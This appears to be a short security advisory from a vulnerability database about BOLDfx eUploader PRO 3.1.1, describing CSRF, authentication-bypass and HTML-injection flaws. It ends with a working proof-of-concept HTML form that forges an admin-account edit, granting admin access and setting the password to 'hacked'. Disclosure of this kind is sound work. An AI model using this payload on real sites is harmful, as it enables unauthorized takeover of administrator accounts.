source: http://www.securityfocus.com/bid/41783/info

BOLDfx eUploader is prone to multiple remote vulnerabilities, including a cross-site request-forgery vulnerability, a security-bypass vulnerability, and an HTML-injection vulnerability.

Attacker-supplied HTML and script code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user. A remote attacker may also be able to perform certain administrative actions without proper authentication; other attacks are also possible.

eUploader PRO 3.1.1 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/admin.php?page=user&id=[ID]" method="post"> <input type="hidden" name="id" value="[ID]"> <input type="hidden" name="admin_access" value="2"> <input type="hidden" name="email" value="my@email.com"> <input type="hidden" name="pass" value="hacked"> <input type="hidden" name="pass2" value="hacked"> <input type="submit" name="edit" value="Submit"> </form> 